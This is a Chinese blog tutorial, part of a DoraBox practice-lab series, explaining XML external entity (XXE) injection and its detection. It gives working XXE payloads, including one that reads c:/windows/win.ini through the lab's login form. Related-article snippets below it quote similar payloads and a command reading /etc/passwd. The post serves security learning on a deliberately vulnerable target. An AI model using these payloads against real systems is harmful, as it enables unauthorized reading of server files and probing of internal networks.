【DoraBox实战】————10、XXE分析与研究

最新推荐文章于 2024-08-29 18:01:17 发布
原创 最新推荐文章于 2024-08-29 18:01:17 发布 · 878 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了XML外部实体注入(XXE)的概念,详细阐述了XXE的检测方法,包括验证XML解析及服务器对DTD的支持,并讨论了XXE漏洞可能带来的危害,如文件读取和命令执行等。最后,通过DoraBox中的XXE实例,展示了如何利用XXE进行安全分析。

什么是XXE

简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。

XXE检测

第一步检测XML是否会被成功解析:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY name "my name is nMask">]>
<root>&name;</root>

如果页面输出了my name is nMask,说明xml文件可以被解析。
第二步检测服务器是否支持DTD引用外部实体:

<?xml version=”1.0” encoding=”UTF-8”?> 
<!DOCTYPE ANY [ 
<!ENTITY % name SYSTEM "http://localhost/index.html"> 
%name; 
]>

可通过查看自己服务器上的日志来判断,看目标服务器是否向你的服务器发了一条请求index.html的请求。

XXE漏洞的危害

xxe漏洞的危害有很多,比如可以文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等,这里就读取任意文件的利用方式进行测试。

XXE实战

下面以DoraBox中的XXE为例做分析与研究:

分析:登录认证逻辑设计

处理逻辑:

从上面可以看到,这里允许加载外部实体,这里利用一波~

利用:

<!DOCTYPE a [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<user><username>&xxe;</username><password>admin</password></user>

 

成功读取到c:\winodws\win.ini文件中的内容~

WEB漏洞——XXE
qq_63594215的博客
04-12 1866
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
DoraBox实战】————1、SQL注入分析研究
Fly_鹏程万里
08-06 832
前言 本篇文章将对SQL数字型、字符型、搜索型3种注入漏洞的分析并利用~ SQL数字型注入 简介:当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 分析:首先,我们可以来看看该sql_num.php文件的设计: 在这里我们从上面往下面分析,首先我们看一下conn.php文件,发现是数据库连接文件 之后查看function.class.php文件,发现是功能函数...
DoraBox实战】————6、代码执行分析研究
Fly_鹏程万里
08-08 510
代码执行 当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时,如果没有考虑用户是否能控制这个字符串,将会造成代码执行漏洞。 常见的代码执行函数 eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_f...
DoraBox之SSRF及XXE
justoneu的博客
06-24 752
XXE漏洞 全称XML External Entity Injection, 即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。 小白感觉这个东西说白了就是文件包含吧,以允许外部实体载入为前提,引入包含恶意构造的内容的文件而造成攻击效果的漏洞吧。 攻击点应该就是可以上传xml代码的地方,并且没有对xml代码进行检测和过滤 SSRF简介 SSRF(Ser
DoraBox-CSRF SSRF
baynk的博客
11-25 1183
0x00 基础知识 之前做DVWA时用的都是写入型的CSRF,这次又学习到了新的东西,可以的,开心。 先了解什么是JSONP,看了几篇文章,看完了才动手做的。 说说JSON和JSONP,也许你会豁然开朗,含jQuery用例 详解JSON和JSONP劫持以及解决方法 JSONP 安全攻防技术(JSON劫持、 XSS漏洞) 浏览器的同源策略及跨域解决方案 0x01 CSRF JSONP劫持 现在...
DoraBox实战】————9、任意文件读取
Fly_鹏程万里
08-10 880
任意文件读取 在web安全中,任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义,就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数,文件包含参数。主要是由于程序对传入的文件名或者...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
其中,提到的参考文献是网络安全领域的重要资料,包含对XXE攻击的更深入分析,以及OWASP对XML相关攻击的介绍。 文章在介绍XXE漏洞的基础上,还涉及到自动化、应急响应、云安全等现代网络安全领域的重要知识点。自动...
vulhub xxe靶机练习——XXE漏洞渗透
最新发布
2301_81525518的博客
08-29 546
首先咱们先根据它的网址进行目录扫描发现除了index.html还有一个.txt。咱们复制找个解码工具去解码进行查看发现它密码被加密了一看是md5加密。发送到重放器发现有回显点咱们在这里输入语句得到一大串编码后的数据。来到浏览器访问自己的ip加上这个php文件然后就得到flag了。它是base32加密来到解密工具进行解密发现还是加密的。进入这个txt文件发现它还有目录咱们进去看看。一看是base64加密再次解密得到地址。发现登录界面输入用户密码登录抓包。查看页面源代码得到一个加密的语句。
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 8386
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
DoraBox实战】————8、SSRF分析研究
Fly_鹏程万里
08-09 585
SSRF简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到它相连而外网隔离的内部系统) SSRF形成原因 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对...
DoraBox-代码/命令 其他
baynk的博客
11-25 1179
0x00 前言 DoraBox最后一篇了,把其余的都写进来。感觉这个靶场弄的好快。。。 0x01 任意代码执行 输入test得到如下报错,原来用的是assert函数 那这里直接就可以使用phpinfo()了。 0x02 任意命令执行 运行cat /etc/passwd出来的结果。。 只有一行输出,其实这个时候干啥都可以,比如echo xxx > /var/www/html/xxxx...
DoraBox实战】————3、CSRF分析研究
Fly_鹏程万里
08-07 815
CSRF简介 CSRF的全名为Cross-site request forgery,它的中文名为跨站请求伪造。 CSRF是一种挟持用户在已经登陆的web应用程序上执行非本意的操作的攻击方式。相比于XSS,CSRF是利用了系统对页面浏览器的信任,XSS则利用了系统对用户的信任。 你也可以这样来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了...
哆啦靶场学习笔记
5L2g556F5ZWl77yf
10-21 1401
文章目录sql注入数字型字符型搜索型XSS跨站反射 XSS 示例CSRFJSONP劫持 https://github.com/gh0stkey/DoraBox sql注入 数字型 注入流程 判断数字型注入 判断字段长度 联合注入 判断数字型注入 判断字段长度 在order by 4 的时候报错,而3不会,证明此表只有3个字段 ?id=1 and 1 = 2 order by 4 --+ 利用 union 定位数据库回显位置 ?id=1 and 1 = 2 union select 1,2,3
哆啦盒(DoraBox)靶场通过教程
玄道的网安博客
04-27 4590
Sql注入 直接开始第一关,sql注入数字型 源码中id是htmlspecialchars过滤的,过滤是过滤单引号,双引号,尖括号和&的,但是过滤的是html实体并不会影响我们的操作 -1 union select 1,2,3 爆数据库:-1 union select 1,user(),database() 爆表:-1 UNION SELECT 1,2,group...
DoraBox 漏洞练习平台
weixin_30477797的博客
04-29 1147
项目地址: https://github.com/gh0stkey/DoraBox SQL注入 SQLi 数字型 判断表中有多少列 http://127.0.0.1/DoraBox/sql_injection/sql_num.php?id=1%20order%20by%201&submit=submit 依次增大order by 后面的值,直到报错,报错...
【愚公系列】2023年05月 Web渗透测试之XXE攻击
热门推荐
时光隧道
08-24 5万+
XXE攻击是指攻击者利用XML解析器漏洞,通过在XML文档中注入恶意代码来攻击服务器的一种类型的攻击。攻击者通常会利用XXE攻击来读取本地文件、执行任意命令、进行内部端口扫描等。这种攻击方式很危险,因为它可以直接访问服务器内部的敏感数据,造成严重的安全威胁。为了防止XXE攻击,我们通常需要对输入的XML文档进行过滤和验证,避免恶意代码的注入。
DoraBox-master综合性靶机练习
滕财然的博客
05-18 2189
文章目录1、SQL注入sql数字型:sql字符型:sql搜索型:2、XSS跨站脚本攻击XSS反射型:XSS存储型:XSS DOM型:3、CSRFJSONP劫持:CORS跨域资源读取:4、文件包含任意文件包含:目录限制文件包含:5、文件上传任意文件上传:JS限制文件上传MIME限制文件上传扩展名限制文件上传内容限制文件上传6、命令执行任意代码执行:任意命令执行:7、SSRF8、其它条件竞争-支付条件竞争-上传任意文件读取XXE 1、SQL注入 攻击者可以提交一段精心构造的数据库查询代码,根据返回的结果,获得
Webug4.0-XXE/Blind XXE注入
baynk的博客
11-27 1275
0x01 XXE注入 似乎这种基础靶场里面都没有blind xxe,看来得赶紧进入一步学习了。 贴一个基础链接XXE漏洞学习 随便输入啥都行,会出现一段代码。 直接在登陆的地方输入下列xml代码 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值